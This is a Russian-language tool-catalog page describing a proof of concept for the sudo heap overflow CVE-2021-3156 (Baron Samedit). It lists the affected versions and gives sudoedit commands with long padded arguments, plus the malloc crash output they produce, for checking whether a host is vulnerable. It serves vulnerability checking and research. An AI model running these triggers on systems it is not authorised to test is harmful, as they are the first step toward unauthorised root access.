Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156 — Эксплойт-доказательство концепции для CVE-2021-3156, переполнения буфера на основе кучи в sudo, которое позволяет локальное повышение привилегий до root через sudoedit -s с специально созданным аргументом командной строки. | Kitploit
Инструменты/GitHubGitHub/shuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingЭксплуатация Бинарных Файлов
GitHubshuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156

Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт-доказательство концепции для CVE-2021-3156, переполнения буфера на основе кучи в sudo, которое позволяет локальное повышение привилегий до root через sudoedit -s с специально созданным аргументом командной строки.

Репозиторий
161 год назадЕщё не проверено

Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156


Версия, уязвимая для эксплойта

Уязвимость Baron Samedit (CVE-2021-3156) затрагивает устаревшие версии sudo 1.8.2 – 1.8.31p2 и стабильные версии 1.9.0 – 1.9.5p1. Эта ошибка переполнения буфера в куче была внесена в июле 2011 года коммитом 8255ed69 и оставалась незамеченной почти десять лет.

Версии sudo до 1.9.5p2 содержат ошибку off-by-one, которая может привести к переполнению буфера в куче, что позволяет повысить привилегии до root с помощью «sudoedit -s» и аргумента командной строки, заканчивающегося обратной косой чертой.

Проверка уязвимости с помощью команды python

sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted

Проверка уязвимости с помощью команды python

sudoedit -s '\' `perl -e 'print "A" x 65536'`
malloc(): corrupted top size
Aborted (core dumped)

Использование и результат в ubuntu 20.04

shuhaib@somebox:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

shuhaib@somebox:~$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted (core dumped)

shuhaib@somebox:~$ sudoedit -s '\' `perl -e 'print "A" x 65536'`
malloc(): corrupted top size
Aborted (core dumped)
Скачать инструмент